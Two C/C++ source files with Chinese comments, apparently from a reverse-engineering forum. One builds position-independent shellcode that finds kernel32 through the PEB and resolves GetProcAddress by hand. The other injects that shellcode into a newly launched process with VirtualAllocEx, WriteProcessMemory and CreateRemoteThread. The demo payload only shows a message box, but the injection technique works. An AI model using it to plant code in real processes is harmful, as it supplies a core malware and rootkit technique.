#include "stdafx.h"
#include "windows.h"

#pragma section(".code",execute,read,write)
#pragma comment(linker, "/merge:.text=.code")       // 将.text合并到.text
#pragma comment(linker, "/merge:.data=.code")        // 将.data合并到.text
#pragma comment(linker, "/section:.code,RWE")        // 将.text段的属性设置为可读、可写、可执行
#pragma code_seg(".code")

#pragma comment(linker, "/entry:\"MyLoadLibray\"") // 指定程序入口函数为StubEntryPoint()

typedef DWORD (WINAPI *LPGETPROCADDRESS)(HMODULE,LPCSTR);        // GetProcAddress
typedef HMODULE (WINAPI *LPLOADLIBRARY)(
  LPCTSTR lpFileName   // file name of module
);

typedef int (WINAPI *LPMESSAGEBOX)(HWND,LPCTSTR,LPCTSTR,UINT);       // MessageBox

DWORD GetGPAFunAddr();
DWORD GetKernel32Base();

HMODULE MyLoadLibray(TCHAR * DllName)
{
	HMODULE hModule;
	LPGETPROCADDRESS g_funGetProcAddress;
	LPLOADLIBRARY  g_funLoadLibrary;
	g_funGetProcAddress = (LPGETPROCADDRESS)GetGPAFunAddr();
	if(NULL!=g_funGetProcAddress)
	{
		HMODULE hMod=(HMODULE)GetKernel32Base();
		
		g_funLoadLibrary  = (LPLOADLIBRARY)g_funGetProcAddress(hMod,"LoadLibraryW");
		if(NULL!=g_funLoadLibrary)
		{
			//hModule=g_funLoadLibrary(DllName);
			if ( !(hModule=g_funLoadLibrary(L"user32.dll") ) )
			{
				return false;
			}
			LPMESSAGEBOX g_funMessageBox = (LPMESSAGEBOX)g_funGetProcAddress(hModule,"MessageBoxW");
			g_funMessageBox(NULL,L"123",NULL,MB_OK);
		}
		
	}
	return NULL;
}

DWORD GetKernel32Base()
{
	DWORD dwKernel32Addr = 0;
	__asm
	{
		push eax
		/*	
		mov eax,dword ptr fs:[0x30] // eax = PEB的地址
		mov eax,[eax+0x0C]          // eax = 指向PEB_LDR_DATA结构的指针
		mov eax,[eax+0x1C]          // eax = 模块初始化链表的头指针InInitializationOrderModuleList
		mov eax,[eax]               // eax = 列表中的第二个条目
		mov eax,[eax+0x08]          // eax = 获取到的Kernel32.dll基址（Win7下获取的是KernelBase.dll的基址）
		mov dwKernel32Addr,eax
		*/
		xor eax,eax;
		mov eax,fs:[0x30];
		mov eax,[eax+0x0c];
		mov eax,[eax+0x14];
		mov eax,[eax];
		mov eax,[eax];
		mov eax,[eax+0x10];
		mov dwKernel32Addr,eax
		pop eax
	}

	return dwKernel32Addr;
}

DWORD GetGPAFunAddr()
{
	DWORD dwAddrBase = GetKernel32Base();

	// 1. 获取DOS头、NT头
	PIMAGE_DOS_HEADER pDos_Header;
	PIMAGE_NT_HEADERS pNt_Header;
	pDos_Header = (PIMAGE_DOS_HEADER)dwAddrBase;
	pNt_Header  = (PIMAGE_NT_HEADERS)(dwAddrBase + pDos_Header->e_lfanew);

	// 2. 获取导出表项
	PIMAGE_DATA_DIRECTORY   pDataDir;
	PIMAGE_EXPORT_DIRECTORY pExport;
	pDataDir = pNt_Header->OptionalHeader.DataDirectory+IMAGE_DIRECTORY_ENTRY_EXPORT;
	pExport  = (PIMAGE_EXPORT_DIRECTORY)(dwAddrBase + pDataDir->VirtualAddress);

	// 3. 获取导出表详细信息
	PDWORD pAddrOfFun      = (PDWORD)(pExport->AddressOfFunctions    + dwAddrBase);
	PDWORD pAddrOfNames    = (PDWORD)(pExport->AddressOfNames        + dwAddrBase);
	PWORD  pAddrOfOrdinals = (PWORD) (pExport->AddressOfNameOrdinals + dwAddrBase);

	// 4. 处理以函数名查找函数地址的请求，循环获取ENT中的函数名，并与传入值对比对，如能匹配上
	//    则在EAT中以指定序号作为索引，并取出其地址值。
	DWORD dwFunAddr;
	for (DWORD i=0; i<pExport->NumberOfNames; i++)
	{
		PCHAR lpFunName = (PCHAR)(pAddrOfNames[i]+dwAddrBase);
		if ( !strcmp(lpFunName, "GetProcAddress") )
		{
			dwFunAddr = pAddrOfFun[pAddrOfOrdinals[i]] + dwAddrBase;
			break;
		}
		if ( i == pExport->NumberOfNames-1 )
			return 0; 
	}
	return dwFunAddr;
}

#include "stdafx.h"
#include "windows.h"
#include "Code.h"

//TCHAR * DllPath=_T("G:\\Data\\Code\\RootKit相关\\ShellCodeBuildEnvironment\\Release\\dll.dll");
//TCHAR * ExePath=_T("c:\\windows\\system32\\notepad.exe");


bool InjectDll(HANDLE hProcess,TCHAR * DllPath,void * lpBuf,DWORD dwSize)
{
	BYTE *  addStart;
	HANDLE hThread;
	BYTE * DllAddr;
	addStart=(BYTE *)VirtualAllocEx(hProcess,0,dwSize,MEM_COMMIT,PAGE_EXECUTE_READWRITE);
	if(!addStart)
	{
		printf("\n VirtualAllocEx失败,addStart==NULL");
		return false;
	}
	DllAddr=(BYTE *)VirtualAllocEx(hProcess,0,1024,MEM_COMMIT,PAGE_EXECUTE_READWRITE);
	if(!DllAddr)
	{
		printf("\n VirtualAllocEx失败，DllAddr==NULLk");
		return false;
	 }
	 printf("\n addStart内存首地址为0x%x",addStart);
	 printf("\n DllAddr内存首地址为0x%x",DllAddr);

	// WriteProcessMemory(hProcess,DllAddr,DllPath,1024,0);
	 WriteProcessMemory(hProcess,addStart,lpBuf,dwSize,0);

	 hThread=CreateRemoteThread(hProcess,0,0,(LPTHREAD_START_ROUTINE)(addStart),NULL,0,0);
	 WaitForSingleObject(hThread,INFINITE);
	 VirtualFreeEx(hProcess,addStart,0,MEM_RELEASE);
	 VirtualFreeEx(hProcess,DllAddr,0,MEM_RELEASE);
	 CloseHandle(hProcess);
	 return true;
}

int _tmain(int argc, _TCHAR* argv[])
{
	STARTUPINFO si={0};
	PROCESS_INFORMATION pi={0};
	si.dwYSize=sizeof(si);
	bool bRet=CreateProcess(argv[1],NULL,NULL,NULL,NULL,CREATE_DEFAULT_ERROR_MODE,NULL,NULL,&si,&pi);
	if(bRet!=NULL)
	{
		HANDLE hProcess=pi.hProcess;
                                ///这儿的data就是从CODE中提取出来的数据
		bRet= InjectDll(hProcess,NULL,data,sizeof(data));
		if(bRet)
			printf("注入成功");
	}
	//getchar();
	return 0;
}

[招生]科锐逆向工程师培训(2024年11月15日实地，远程教学同时开班, 第51期)